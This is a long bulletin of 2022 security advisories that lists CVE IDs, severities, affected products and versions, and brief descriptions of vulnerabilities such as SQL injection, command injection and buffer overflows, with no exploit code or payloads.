CVE ID: CVE-2022-22897 (Critical)
It has been discovered that morgan-json package is vulnerable to arbitrary code execution
due to missing sanitization of input passed to the Function constructor. All versions of
morgan-json package are vulnerable.
CVE ID: CVE-2022-25921 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Sinsiu Enterprise Website
System. The affected version is Sinsiu Enterprise Website System v1.1.1.0.
CVE ID: CVE-2022-36572 (Critical)
A SQL injection vulnerability has been discovered in Ingredients Stock Management System.
The affected version is Ingredients Stock Management System V1.0.
CVE ID: CVE-2022-36706 (Critical)
A SQL injection vulnerability has been discovered in Ingredients Stock Management System.
The affected version is Ingredients Stock Management System V1.0.
CVE ID: CVE-2022-36705 (Critical)
A command injection vulnerability has been discovered in D-Link GO-RT-AC750
GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 via /cgibin, hnap_main.
CVE ID: CVE-2022-37056 (Critical)
A buffer overflow vulnerability has been discovered in D-Link Go-RT-AC750
GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 via cgibin, hnap_main.
CVE ID: CVE-2022-37055 (Critical)
Contec has released security updates to address multiple vulnerabilities in FLEXLAN FX3000
and FX2000 series. The affected versions are FLEXLAN FX3000 series prior to ver.1.16.00, and
FLEXLAN FX2000 series prior to ver.1.39.00.
CVE ID: CVE-2022-36158 (High), CVE-2022-36159 (High)
Multiple vulnerabilities have been discovered in Contec Health's Equipment- CMS8000 CONTEC
ICU CCU Vital Signs Patient Monitor that can allow a threat actor to cause a Denial of
Service (DoS) condition, modify firmware with physical access to the device, access a root
shell, or employ hard-coded credentials to make configuration changes.
CVE ID: CVE-2022-36385 (Medium), CVE-2022-38100 (High), CVE-2022-38069 (Medium),
CVE-2022-38453 (Low), CVE-2022-3027 (Medium)
An out-of-bounds read vulnerability has been discovered in Delta Electronics' Equipment-
DOPSoft that can allow an attacker to gain sensitive information.
CVE ID: CVE-2022-2966 (Low)
Dell has released security updates to address an improper certificate validation
vulnerability in Dell OS10 SupportAssist. A remote unauthenticated user can exploit this
vulnerability, leading to unauthorized access to limited switch configuration data that can
be leveraged to conduct Man-in-The-Middle (MiTM) attacks. The affected version is Dell OS10
version 10.5.3.4.
CVE ID: CVE-2022-34394 (Low)
Google has released Chrome Beta 106 (106.0.5249.10) for iOS, Dev channel 107.0.5263.0
(Platform version: 15081.0.0) for a limited set of ChromeOS devices, Beta channel
106.0.5249.14 (Platform version: 15054.18.0/15054.19.0) for most ChromeOS devices, Chrome
106 (106.0.5249.21) Beta channel for Windows, Linux and Mac, Chrome Stable 105
(105.0.5195.98) for iOS, Chrome Dev 107 (107.0.5271.2) for Android, and Dev channel
106.0.5249.21 for Windows, Mac & Linux.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Huawei has released security update to address an out-of-bounds read and write vulnerability
in Huawei Headset products. An attacker can exploit these vulnerabilities to take control of
an affected system.
CVE ID: CVE-2020-36602 (High)
Ubuntu has released security updates to address an out-of-bounds write vulnerability in
Linux kernel that can cause a Denial of Service (DoS) or possibly execute arbitrary code.
The affected products are Ubuntu 16.04 ESM, and Ubuntu 14.04 ESM.
CVE ID: CVE-2021-33656 (High)
WordPress has released security updates to address multiple Cross-Site Scripting (XSS)
vulnerabilities in Image Hover Effects Ultimate plugins for WordPress. The affected versions
are Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)
versions up to, and including 9.7.3.
CVE ID: CVE-2022-2935 (Medium), CVE-2022-2936 (Medium), CVE-2022-2937
(Medium)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.2.1. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-3033 (High), CVE-2022-3032 (Medium), CVE-2022-3034 (Medium),
CVE-2022-36059 (Medium)
Apple has released security updates to address an out-of-bounds write vulnerability in iOS
12.5.6 for iPhone and iPod touch. Processing maliciously crafted web content can lead to
arbitrary code execution. The affected products are iPhone 5s, iPhone 6, iPhone 6 Plus, iPad
Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).
CVE ID: CVE-2022-32893
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Edoc-doctor-appointment-system contains a SQL injection
vulnerability via the id parameter at /patient/settings.php. The affected version is
Edoc-doctor-appointment-system v1.0.1.
CVE ID: CVE-2022-36545 (Critical)
A SQL injection vulnerability has been discovered in Edoc-doctor-appointment-system via the
id parameter at /patient/booking.php. The affected version is Edoc-doctor-appointment-system
v1.0.1.
CVE ID: CVE-2022-36544 (Critical)
It has been discovered that Edoc-doctor-appointment-system contains a SQL injection
vulnerability via the id parameter at /patient/doctors.php. The affected version is
Edoc-doctor-appointment-system v1.0.1.
CVE ID: CVE-2022-36543 (Critical)
A weak password vulnerability has been discovered in the management system of RuoYi. The
affected version is RuoYi v3.8.3.
CVE ID: CVE-2022-37158 (Critical)
An arbitrary file execution vulnerability has been discovered in the container package in
MikroTik RouterOS. The affected version is MikroTik RouterOS 7.4beta4.
CVE ID: CVE-2022-34960 (Critical)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-40663 (Critical), CVE-2022-29078 (Critical), CVE-2022-29968 (High),
CVE-2022-1116 (High)
Multiple vulnerabilities have been discovered in PLANEX Network camera products SmaCam
CS-QR10 and SmaCam Night Vision CS-QR20 that can cause execution of arbitrary OS command on
the affected products.
CVE ID: CVE-2022-38399 (Medium), CVE-2017-12576 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Fuji Electric has released security updates to address out-of-bounds read, and
write-what-where condition vulnerabilities in its equipment- D300win. Successful
exploitation can result in loss of sensitive data and manipulation of information.
CVE ID: CVE-2022-1738 (High), CVE-2022-1523 (Medium)
A cleartext transmission of sensitive information OT:ICEFALL vulnerability has been
discovered in Honeywell's Equipment- Trend Controls IQ Series that utilize Inter-Controller
(IC) protocol: all versions. Successful exploitation can cause the loss of authentication
information in cleartext by sniffing network traffic. The mitigations are available.
CVE ID: CVE-2022-30312 (High)
An use after free vulnerability has been discovered in Omron's Equipment- CX-Programmer.
Successful exploitation can allow an attacker to execute arbitrary code. The affected
products are Omron CX-Programmer, all versions prior to v9.78. The mitigations are
available.
CVE ID: CVE-2022-2979 (High)
Johnson Controls has released a security update to resolve a vulnerability in its product
iSTAR Ultra. An unauthenticated user can craft an HTTP post request to run arbitrary
commands as root user. The affected products are all iSTAR Ultra firmware versions prior to
6.8.9.CU01. The mitigations are available.
CVE ID: CVE-2022-21941
WordPress has released security updates to address multiple stored Cross-Site Scripting
(XSS) vulnerabilities in Beaver Builder WordPress Page Builder plugin for WordPress. The
affected versions are Beaver Builder WordPress Page Builder versions up to, and including
2.5.5.2.
CVE ID: CVE-2022-2517 (Medium), CVE-2022-2695 (Medium)
Dell has released security updates to address multiple vulnerabilities in third-party
Component PostgreSQL that affects several Dell NetWorker products.
HP has released security updates to address Denial of Service (DOS) vulnerability in HP
Print and Digital Send products.
CVE ID: CVE-2022-0778 (Medium)
Debian has released a security update to address a buffer overflow vulnerability in the
vhost code of DPDK, which can result in Denial of Service (DoS) or the execution of
arbitrary code by malicious guests/containers.
CVE ID: CVE-2022-2132, CVE-2022-28199
It has been discovered that Le-yan Personnel and Salary Management System has hard-coded
database account and password within the website source code. An unauthenticated remote
attacker can access, modify system data or disrupt service.
CVE ID: CVE-2022-38116 (Critical)
An use after free vulnerability has been discovered in storage of Google Chrome prior to
100.0.4896.88 that allow a malicious extension to potentially perform a sandbox escape via a
crafted Chrome Extension.
CVE ID: CVE-2022-1312 (Critical)
Multiple vulnerabilities in open-source software components (JQuery, GoAhead Embedded
Webserver, and Curl) have been discovered in Hitachi Energy's Equipment- MSM products, that
can disrupt the functionality of the MSM web interface, steal sensitive user credentials, or
cause a Denial of Service (DoS) condition. The affected products are MSM version 2.2 and
earlier.
CVE ID: CVE-2015-6584 (Medium), CVE-2016-7103 (Medium), CVE-2011-4273 (Medium),
CVE-2018-16842 (Critical), CVE-2016-9586 (High), CVE-2016-8617 (High), CVE-2016-8618
(Critical), CVE-2016-8619 (Critical), CVE-2016-8621 (High), CVE-2016-7167 (Critical),
CVE-2014-3707 (Medium), CVE-2013-2174 (Medium), CVE-2014-0138 (Medium)
Honeywell has released security updates to address a missing authentication for critical
function OT:ICEFALL vulnerability in Honeywell's Equipment- ControlEdge. Successful
exploitation can allow full control of the device, which can include Remote Code Execution
(RCE), Denial of Service (DoS), or configuration manipulation.
CVE ID: CVE-2022-30318 (Critical)
A missing authentication for critical function OT:ICEFALL vulnerability has been discovered
in Honeywell's Equipment- Experion LX, that can allow configuration manipulation and a
Denial of Service (DoS) condition. The mitigations are available.
CVE ID: CVE-2022-30317 (Critical)
Multiple vulnerabilities such as heap-based buffer overflow, and stack-based buffer overflow
have been discovered in PTC's Equipment- Kepware KEPServerEX, that can allow an adversary to
crash the device or remotely execute arbitrary code. The affected products are Kepware
KEPServerEX v6.11 or lower, ThingWorx Kepware Server: v6.11 or lower, ThingWorx Industrial
Connectivity all versions, OPC-Aggregator: v6.11 or lower, ThingWorx Kepware Edge v1.4 or
lower, Rockwell Automation KEPServer Enterprise: v6.11 or lower, GE Digital Industrial
Gateway Server: v7.611 or lower and Software Toolbox TOP Server: v6.11 or lower. The
mitigations are available.
CVE ID: CVE-2022-2848 (Critical), CVE-2022-2825 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-34568 (High), CVE-2022-2787, CVE-2022-2526
NVIDIA has released security update for Data Plane Development Kit (MLNX_DPDK) to address a
vulnerability that can cause denial of service, and some impact to data integrity and
confidentiality.
CVE ID: CVE-2022-28199 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that the package com.google.code.gson:gson is vulnerable to
Deserialization of Untrusted Data via the writeReplace() method in internal classes, which
can lead to DoS attacks. This vulnerability allows a remote, authenticated attacker to cause
a denial-of-service (DoS) on the F5 BIG-IP system specific to the iAppsLX service, and the
BIG-IQ system specific to the iControl REST framework.
CVE ID: CVE-2022-25647 (Medium)
Debian has released security updates to address multiple vulnerabilities in Thunderbird,
which can result in denial of service or the execution of arbitrary code.
CVE ID: CVE-2022-38472 (High), CVE-2022-38473 (High), CVE-2022-38478
(High)
NetApp has released security updates to address multiple vulnerabilities in Java Platform
Standard Edition that affects several NetApp products.
CVE ID: CVE-2022-21540 (Medium), CVE-2022-21541 (Medium), CVE-2022-21549 (Medium),
CVE-2022-34169 (High)
It has been discovered that MDaemon Technologies' SecurityGateway for Email Server is
vulnerable to HTTP Response splitting vulnerability via the data parameter. The affected
version is SecurityGateway for Email Servers 8.5.2.
CVE ID: CVE-2022-37242 (Critical)
It has been discovered that H3C H200 H200V100R004 contain a stack overflow vulnerability via
the function UpdateMacClone.
CVE ID: CVE-2022-37100 (Critical)
It has been discovered that in Apache Maven maven-shared-utils the Commandline class can
emit double-quoted strings without proper escaping, allowing shell injection attacks. The
affected versions are Apache Maven maven-shared-utils prior to version 3.3.3.
CVE ID: CVE-2022-29599 (Critical)
Aruba has released security updates to address an authenticated remote command injection
vulnerability in Aruba ClearPass Policy Manager. The affected versions are Aruba ClearPass
Policy Manager versions 6.10.4 and below, 6.9.9 and below, 6.8.9-HF2 and below, 6.7.x and
below.
CVE ID: CVE-2022-23663 (Critical)
It has been discovered that Ricoh Device Software Manager installer contains a vulnerability
in the DLL search path, which can lead to insecure loading of Dynamic Link Libraries.
Arbitrary code can be executed with the privilege of the user invoking the installer. The
affected versions are Installer of Device Software Manager prior to Ver.2.20.3.0.
CVE ID: CVE-2022-36403 (High)
Multiple vulnerabilities have been discovered in CentreCOM AR260S V2. A remote attacker can
execute an arbitrary OS command. The affected versions are CentreCOM AR260S V2 firmware
prior to Ver.3.3.7.
CVE ID: CVE-2022-35273 (High), CVE-2022-38394 (High), CVE-2022-34869 (High),
CVE-2022-38094 (High)
It has been discovered that NVFLARE contains a deserialization of Untrusted Data
vulnerability due to Pickle usage that allow an unprivileged network attacker to cause
Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.
The affected versions are NVFLARE prior to 2.1.4.
CVE ID: CVE-2022-34668 (Critical)
A memory corruption vulnerability has been discovered in kernel of PowerVR GPU driver that
allows unprivileged apps to allocated pinned memory, unpin it (which makes it available to
be freed), and continue using the page in GPU calls.
CVE ID: CVE-2022-20122 (Critical)
Google has released Dev channel 106.0.5249.12 (Platform version: 15054.14.0) for most
ChromeOS devices, and Chrome Beta 105 (105.0.5195.68) for Android.
Foxit has released an updated Foxit PDF Editor 11.2.3 to resolve multiple vulnerabilities in
Foxit PDF Editor 11.2.2.53575 and all previous 11.x versions, 10.1.8.37795 and earlier.
A SQL injection vulnerability has been discovered in Online Diagnostic Lab Management
System. The affected version is Online Diagnostic Lab Management System 1.0.
CVE ID: CVE-2022-37152 (Critical)
A SQL injection vulnerability has been discovered in Simple Task Scheduling System. The
affected version is Simple Task Scheduling System 1.0.
CVE ID: CVE-2022-36683 (Critical)
A SQL injection vulnerability has been discovered in Ingredients Stock Management System.
The affected version is Ingredients Stock Management System 1.0.
CVE ID: CVE-2022-36697 (Critical)
It has been discovered that Claroline is vulnerable to remote code execution vulnerability
via arbitrary file upload. The affected versions are Claroline 13.5.7 and prior.
CVE ID: CVE-2022-37159 (Critical)
A stack overflow vulnerability has been discovered in Tenda AC1206. The affected version is
Tenda AC1206 V15.03.06.23.
CVE ID: CVE-2022-37815 (Critical)
Broken Authentication vulnerability has been discovered in yotuwp Video Gallery plugin of
WordPress. The affected versions are yotuwp Video Gallery plugin 1.3.4.5 and prior.
CVE ID: CVE-2022-35726 (Critical)
Missing authentication for critical function vulnerability has been discovered in UNIMO
Technology digital video recorders that allows a remote unauthenticated attacker to execute
an arbitrary OS command by sending a specially crafted request to the affected device web
interface.
CVE ID: CVE-2022-35733 (Critical)
A directory traversal vulnerability has been discovered in the unzipDirectory functionality
of WWBN AVideo and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to
arbitrary command execution.
CVE ID: CVE-2022-30547 (Critical)
Server-side request forgery (SSRF) vulnerability has been discovered in wkhtmlTOpdf that
allows an attacker to get initial access into the target's system by injecting iframe tag
with initial asset IP address on it's source. The affected version is wkhtmlTOpdf 0.12.6.
CVE ID: CVE-2022-35583 (Critical)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-40663 (Critical), CVE-2022-21151 (Medium), CVE-2022-31627
(Critical), CVE-2022-32083 (High), CVE-2022-32086 (High), CVE-2022-34903 (Medium),
CVE-2022-34918 (High), CVE-2022-2056 (Medium), CVE-2022-2057 (Medium), CVE-2022-2058
(Medium)
An out-of-bounds write vulnerability has been discovered in FATEK Automation's Equipment-
FvDesigner that can cause Remote Code Execution (RCE).
CVE ID: CVE-2022-2866 (High)
Google has released Chrome Dev 106 (106.0.5249.9) for Android, Dev channel 106.0.5249.12 for
Windows, Mac and Linux, and Chrome Beta 105 (105.0.5195.58) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Tenda AC1206 contains a stack overflow vulnerability via the
function fromSetIpMacBind. The affected version is Tenda AC1206 V15.03.06.23.
CVE ID: CVE-2022-37816 (Critical)
An arbitrary code execution vulnerability has been discovered in the file upload wizard of
Zengenti Contensis Classic. The affected versions are Zengenti Contensis Classic before
15.2.1.79.
CVE ID: CVE-2022-34919 (Critical)
Debian has released a security update to address a heap-based buffer overflow vulnerability
in the zlib package, which can result in Denial of Service (DoS) or potentially the
execution of arbitrary code if specially crafted input is processed.
CVE ID: CVE-2022-37434 (Critical)
Ubuntu has released security updates to address several vulnerabilities in the
linux-azure-fde package - Linux kernel (Azure CVM). An attacker can exploit these
vulnerabilities to take control of an affected system. the affected product is Ubuntu 20.04
LTS.
CVE ID: CVE-2022-1974, CVE-2022-0494, CVE-2022-34918, CVE-2022-1734, CVE-2022-1975,
CVE-2022-1652, CVE-2022-28893, CVE-2022-1048, CVE-2022-2588, CVE-2022-1679,
CVE-2022-2586
F5 has released security updates to address an improper resource shutdown or release
vulnerability in BIG-IP systems that can cause a degradation of service & can lead to a
Denial of Service (DoS) on the BIG-IP system.
CVE ID: CVE-2022-35240 (High)
Atlassian has released security update to address a command injection vulnerability
Bitbucket Server and Data Center. All versions of Bitbucket Server and Datacenter after
6.10.17 including 7.0.0 and newer are affected by this vulnerability.
CVE ID: CVE-2022-36804 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20823 (High), CVE-2022-20824 (High), CVE-2022-20921 (High),
CVE-2022-20865 (Medium)
SonicWall has released security updates to address Heap-based Buffer Overflow, and Exposure
of Sensitive Information vulnerabilities in the SonicWall SMA100 appliance.
CVE ID: CVE-2022-2915 (High)
An access bypass vulnerability has been discovered in Commerce Elavon, a third-party library
used by Drupal. Commerce Elavon has released security update to address this vulnerability.
Google has released Dev channel 106.0.5249.7 (Platform version: 15054.10.0) for most
ChromeOS devices, Beta channel 105.0.5195.52 for Windows, Mac and Linux, and Chrome Beta 105
(105.0.5195.47) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-1552 (High), CVE-2020-35513 (Medium)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-30560 (High), CVE-2022-38472 (Medium), CVE-2022-38473,
CVE-2022-38478, CVE-2022-31676
A SMM memory corruption vulnerability has been discovered in InsydeH20 that affects NetApp
products that can lead to disclosure of sensitive information, addition or modification of
data, or Denial of Service (DoS).
CVE ID: CVE-2021-33625 (High)
A SQL injection vulnerability has been discovered in line 132 of admin/area.php of Bluecms.
The affected version is Bluecms 1.6.
CVE ID: CVE-2022-37113 (Critical)
A SQL injection vulnerability has been discovered in in line 55 of admin/model.php of
Bluecms. The affected version is Bluecms 1.6.
CVE ID: CVE-2022-37112 (Critical)
A SQL injection vulnerability has been discovered in line 132 of admin/article.php of
Bluecms. The affected version is Bluecms 1.6.
CVE ID: CVE-2022-37111 (Critical)
A SQL injection vulnerability has been discovered in JFinal CMS via
/jfinal_cms/system/role/list. The affected version is JFinal CMS 5.1.0.
CVE ID: CVE-2022-37223 (Critical)
A SQL injection vulnerability has been discovered in JFinal CMS via
/jfinal_cms/system/user/list. The affected version is JFinal CMS 5.1.0.
CVE ID: CVE-2022-37199 (Critical)
An arbitrary file deletion vulnerability has been discovered in taocms that allows to
delete file in server. The affected version is taocms 3.0.2.
CVE ID: CVE-2022-36261 (Critical)
It has been discovered that HTTP applications (servers) based on Crow can allow a
Use-After-Free and code execution when HTTP pipelining is used. The affected versions are
Crow through 1.0+4.
CVE ID: CVE-2022-38667 (Critical)
A buffer overflow vulnerability has been discovered in D-link DIR-816. The affected version
is D-link DIR-816 A2_v1.10CNB04.img.
CVE ID: CVE-2022-37134 (Critical)
A Java deserialization vulnerability has been discovered in the Fishbowl Server of Fishbowl
Inventory that allows remote attackers to execute arbitrary code via a crafted XML payload.
The affected versions are Fishbowl Inventory versions prior to 2022.4.1.
CVE ID: CVE-2022-29805 (Critical)
A read-beyond-bounds vulnerability has been discovered in Apache HTTP Server that can lead
to a crash or disclosure of information. The affected versions are Apache HTTP Server 2.4.53
and earlier.
CVE ID: CVE-2022-28615 (Critical)
It has been discovered that a missing segregation of duty for the SAP Solution Manager
administrator can impact unauthorized execution of commands that lead to sensitive
information disclosure, loss of system integrity and Denial of Service.
CVE ID: CVE-2022-22544 (Critical)
A request smuggling and request concatenation vulnerability has been discovered in SAP
NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP
Content Server 7.53 and SAP Web Dispatcher.
CVE ID: CVE-2022-22536 (Critical)
A vulnerability has been discovered in SAP NetWeaver Application Server Java - versions
KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49 &
7.53, that can trigger improper shared memory buffer handling when a crafted HTTP server
request is submitted.
CVE ID: CVE ID: CVE-2022-22532 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel and
Twisted. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-33655 (High), CVE-2021-33061 (Medium), CVE-2022-24801
Multiple vulnerabilities such as reflected Cross Site Scripting (XSS), and HTTP response
splitting vulnerabilities have been discovered in WorkstationST. The affected versions are
WorkstationST prior to v07.09.15.
CVE ID: CVE2022-37952 (Low), CVE-2022-37953 (Low)
VMware has released security updates to address a Local privilege escalation vulnerability
in VMware Tools. A malicious actor with local non-administrative access to the Guest OS can
escalate privileges as a root user in the virtual machine.
CVE ID: CVE-2022-31676 (High)
ARC Informatique has released security updates to address a cleartext storage of sensitive
information vulnerability in its equipment- PcVue. Successful exploitation vulnerability can
allow to access the OAuth web service database.
CVE ID: CVE-2022-2569 (Medium)
Measuresoft has released a security update to address an out-of-bounds write vulnerability
in its equipment- ScadaPro Server, that can allow arbitrary code execution.
CVE ID: CVE-2022-2892 (High)
Multiple vulnerabilities have been discovered in Measuresoft's Equipment- ScadaPro Server
and Client that can cause arbitrary code execution, privilege escalation, or a Denial of
Service condition.
CVE ID: CVE-2022-2894 (High), CVE-2022-2895 (High), CVE-2022-2896 (High),
CVE-2022-2897 (High), CVE-2022-2898 (Medium)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-38663 (Medium), CVE-2022-38664 (High), CVE-2022-38665 (Low),
CVE-2021-25738 (High)
Dell has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-26691, CVE-2022-1271, CVE-2022-1586, CVE-2022-31741, CVE-2015-20107,
CVE-2022-2068, CVE-2022-1292, CVE-2022-1664, CVE-2020-17530, CVE-2022-0778, CVE-2022-1292,
CVE-2022-2068
A reflected Cross Site Scripting (XSS) vulnerability has been discovered in the charts tab
selection functionality of WWBN AVideo and dev master commit 3f7c0364 that can lead to
arbitrary Javascript execution.
CVE ID: CVE-2022-26842 (Critical)
An authentication bypass vulnerability has been discovered in miniOrange OAuth plugin for
WordPress.
CVE ID: CVE-2022-34858 (Critical), CVE-2022-34149 (Critical)
Multiple SQL injection vulnerabilities have been discovered in Bus Pass Management System.
The affected versions are Bus Pass Management System 1.0.
CVE ID: CVE-2022-36198 (Critical)
A stack buffer overflow vulnerability has been discovered in Tenda ac15 firmware. The
affected version is Tenda ac15 firmware V15.03.05.18 httpd server.
CVE ID: CVE-2022-37175 (Critical)
A memory corruption vulnerability has been discovered in jsonxx or Json++ . The updates are
not expected, users are advised to find a replacement.
CVE ID: CVE-2022-23459 (Critical)
A SQL injection vulnerability has been discovered in Yimioa via the orderbyGET parameter.
The affected version is Yimioa v6.1.
CVE ID: CVE-2022-36605 (Critical)
A Remote Command Execution (RCE) vulnerability has been discovered in Tenda-AC18. The
affected version is Tenda-AC18 V15.03.05.05.
CVE ID: CVE-2022-35201 (Critical)
It has been discovered that Mealie employs weak password requirements which allows an
adversary to potentially gain unauthorized access to the application via brute-force
attacks. The affected version is Mealie 1.0.0beta3.
CVE ID: CVE-2022-34615 (Critical)
A use of hard-coded cryptographic key vulnerability has been discovered in Delta
Electronics' Equipment- Delta Industrial Automation DIALink that can result in the exposure
of sensitive data.
CVE ID: CVE-2022-2660 (Critical)
A command injection vulnerability has been discovered in mySCADA Technologies' Equipment-
mySCADA myPRO. Successful exploitation can allow to run commands directly in the operating
system.
CVE ID: CVE-2022-2234 (Critical)
PukiWiki has released a security update to address path traversal, and reflected Cross-site
Scripting (XSS) vulnerabilities in PukiWiki.
CVE ID: CVE-2022-34486 (High), CVE-2022-27637 (Medium)
WordPress has released security updates to address multiple vulnerabilities in the WordPress
Infinite Scroll Ajax Load More plugin for WordPress, and WP-UserOnline plugin for WordPress.
CVE ID: CVE-2022-2943 (Medium), CVE-2022-2945 (Medium), CVE-2022-2433 (High),
CVE-2022-2941 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
F5 has released security updates to address a vulnerability in 'node' iRules command which
allows an attacker to bypass the access control restrictions for a self IP address,
regardless of the port lockdown settings. Successful exploitation can connect to internal IP
addresses/services through an iRule that allows unconstrained manipulation of the target of
the node command.
CVE ID: CVE-2022-33962 (Medium)
Trellix has released security updates to address an improper restriction of XML external
entity reference vulnerability in Data Loss Prevention (DLP) Endpoint for Windows. The
affected versions are Data Loss Prevention Endpoint for Windows prior to 11.6.600 and
11.9.100.
CVE ID: CVE-2022-2330 (Medium)
An XML External Entity Injection (XXE) vulnerability has been discovered in IBM MQ while
processing XML data. A remote attacker can exploit this vulnerability to expose sensitive
information or consume memory resources. The affected versions are IBM MQ 8.0, 9.0 LTS, 9.1
LTS, 9.2 LTS, 9.1 CD, and 9.2 CD.
CVE ID: CVE-2022-22489 (Critical)
It has been discovered that Kiosk breakout (without quit password) in Safe Exam Browser
(Windows) allows an attacker to achieve code execution via the browsers' print dialog. The
affected versions are Safe Exam Browser (Windows) prior to 3.4.0.
CVE ID: CVE-2022-36220 (Critical)
A SQL injection vulnerability has been discovered in Library Management System. The affected
version is Library Management System v1.0.
CVE ID: CVE-2022-36729 (Critical), CVE-2022-36728 (Critical), CVE-2022-36727
(Critical)
Authentication bypass vulnerability has been discovered in Open AMT Cloud Toolkit software
for Intel(R). The affected versions are Open AMT Cloud Toolkit software for Intel(R) before
versions 2.0.2 and 2.2.2.
CVE ID: CVE-2022-25899 (Critical)
It has been discovered that Apache Xalan Java XSLT library is vulnerable to an integer
truncation vulnerability when processing malicious XSLT stylesheets. This vulnerabilitiy can
be used to corrupt Java class files generated by the internal XSLTC compiler and execute
arbitrary Java bytecode. No security update will be released by Apache Xalan Java to
address this vulnerability.
CVE ID: CVE-2022-34169 (Critical)
GitLab has released updated versions 15.3.1, 15.2.3, and 15.1.5 for GitLab Community Edition
(CE) and Enterprise Edition (EE) to resolve multiple vulnerabilities.
CVE ID: CVE-2022-2884 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Libxslt and Exim.
An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2019-5815 (High), CVE-2021-30560 (High), CVE-2022-37452
(Critical)
Debian has released security updates to address multiple buffer overflow vulnerabilities in
Kicad package, which can result in the execution of arbitrary code.
CVE ID: CVE-2022-23803 (High), CVE-2022-23804 (High), CVE-2022-23946 (High),
CVE-2022-23947 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that insufficiently protected credentials for Intel(R) AMT and
Intel(R) Standard Manageability can allow information disclosure and escalation of privilege
via network access.
CVE ID: CVE-2022-30601 (Critical)
A remote command injection vulnerability has been discovered in FLIR AX8 thermal sensor
cameras that can allow to execute arbitrary commands on the underlying operating system with
the root privileges. The affected versions are all FLIR AX8 thermal sensor cameras version
up to and including 1.46.16.
CVE ID: CVE-2022-37061 (Critical)
Huawei has released a security update to address a permission bypass vulnerability in Huawei
cross device task management. Successful exploitation can allow an attacker to access
certain resources on the attacked devices.
CVE ID: CVE-2021-46834 (Medium)
Schneider Electric has released security updates to resolve multiple vulnerabilities in the
BMENUA0100 - OPC UA module and the BMENOR2200H X80 Advanced RTU communication module for
M580.
CVE ID: CVE-2022-34759 (High), CVE-2022-34760 (High), CVE-2022-34761 (High),
CVE-2022-34762 (Medium), CVE-2022-34763 (Medium), CVE-2022-34764 (Medium), CVE-2022-34765
(Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-23055 (Medium), CVE-2022-29582 (High), CVE-2022-32981 (High),
CVE-2022-2274 (High), CVE-2022-22576 (Medium), CVE-2022-27774 (High), CVE-2022-27775 (High),
CVE-2022-27776 (High)
Microsoft has released Microsoft Edge Stable Channel (Version 104.0.1293.63). This update
contains a fix for CVE-2022-2856, which has an exploit in the wild.
A stack buffer overflow vulnerability has been discovered due to unsafe parsing of a PNG
tRNS chunk in FastStone Image Viewer. The affected versions are FastStone Image Viewer
through 7.5.
CVE ID: CVE-2022-36947 (Critical)
It has been discovered that Hardcoded JWT Secret in AgileConfig Server allows remote
attackers to use the generated JWT token to gain administrator access. The affected versions
are AgileConfig Server prior to 1.6.8.
CVE ID: CVE-2022-35540 (Critical)
A SQL injection vulnerability has been discovered in Library Management System. The affected
version is Library Management System v1.0.
CVE ID: CVE-2022-36725 (Critical), CVE-2022-36722 (Critical)
Apple has released security update to address an out-of-bounds write vulnerability in Safari
for macOS Big Sur and macOS Catalina.
CVE ID: CVE-2022-32893
Siemens has released security updates to address OpenSSL Infinite Loop vulnerability in
multiple industrial products. Successful exploitation of this vulnerability can create a
denial-of-service condition in the affected products.
CVE ID: CVE-2022-0778 (High)
Dell has released security updates to address multiple vulnerabilities in Dell EMC PowerFlex
Rack that can be exploited by malicious users to compromise the affected system.
A SQL injection vulnerability has been discovered in Barangay Management System. The
affected version is Barangay Management System v1.0.
CVE ID: CVE-2022-35175 (Critical)
